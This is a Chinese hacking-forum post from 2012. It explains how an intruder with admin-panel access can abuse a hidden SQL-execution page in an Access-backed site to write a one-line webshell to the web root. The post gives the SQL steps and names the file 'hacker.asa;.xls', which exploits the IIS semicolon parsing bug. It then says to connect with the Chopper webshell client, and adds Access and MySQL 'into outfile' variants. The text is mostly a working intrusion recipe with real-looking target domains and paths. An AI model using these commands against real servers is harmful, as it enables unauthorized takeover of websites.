找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1913|回复: 0
打印 上一主题 下一主题

ACCESS执行SQL命令导出一句话SHELL

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:53:58 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
好不容易进了后台,发现啥上传啊。备份啊多木有。5 ]+ U8 C6 n% q! G
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的; C: q+ d+ h; u
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
- ]% _* J9 F6 g( }% b然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
+ H, w; w5 \1 \+ a/ ?1.create table cmd (a varchar(50))
7 N, C1 H7 a/ U: t* D2.insert into cmd (a) values (‘‘)
9 C* z/ [( R& R0 p3 h: C3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd8 q( ^6 Z  m4 l
(把表cmd的内容导出为物理路径的一个EXCEL文件)/ q% O& p% U1 [1 u6 v5 C3 Y% p
4.drop table cmd
" h5 Y/ \2 G0 @  _利用IIS的BUG成功拿到了WEBSHELL。+ ^6 g0 b2 a" M+ `& b* B' ?

- S. C3 a$ e2 m  Y, d0 Z. u4 `直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
/ f( `% G5 U& S4 M& P
5 x- q/ k9 M+ e; _, K) x/ s0 D  SQL语句意思解释:
$ f0 l! J" h) L! K; c/ D9 R: s  第一句
# J, P3 V& z- X+ \! ?  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为503 v4 N' J$ @4 I8 v# q0 P

* l" |. ]5 r! Q9 |  b; [  第二句# V" H, x! N9 _4 ^6 F) }( J
  在表cmd的a字段插入一句话木马6 q+ t( ~/ b  u! u
  第三句% ?. o, a- f8 X  _% h
  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
% `$ Z1 ]6 x, `" u  Z: n6 J9 [* v$ G# d4 l" m3 i  S
  第四句
$ S0 Y& ?8 m& O" r- \4 _! a  删除建立的cmd表
8 d. }9 N4 k' o/ U! M: i' e5 u: D. l$ y1 a8 j/ \& H
  以下内容为测试:9 ]' i+ H& h8 C/ S
  Access利用后台SQL执行命令功能导出WebShell:- e! z" k0 i* q) g. I3 w
  这个更简单:
1 v  O- t) y5 `( |$ _1 @  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]0 p5 h( w6 v  u6 p! g" d
  或者- N, h! S0 k2 `7 |/ {
  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
9 S' }8 p) |3 Q( y- ?7 W. x" Q
8 m1 Y1 H0 N4 ?6 N6 r3 {  后台有执行SQL语句功能(vote为已知表段)
& Q3 f+ Q& v2 h2 {  希望对大家有所帮助拿shell的又一个思路9 X7 V0 e% a. g5 `
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表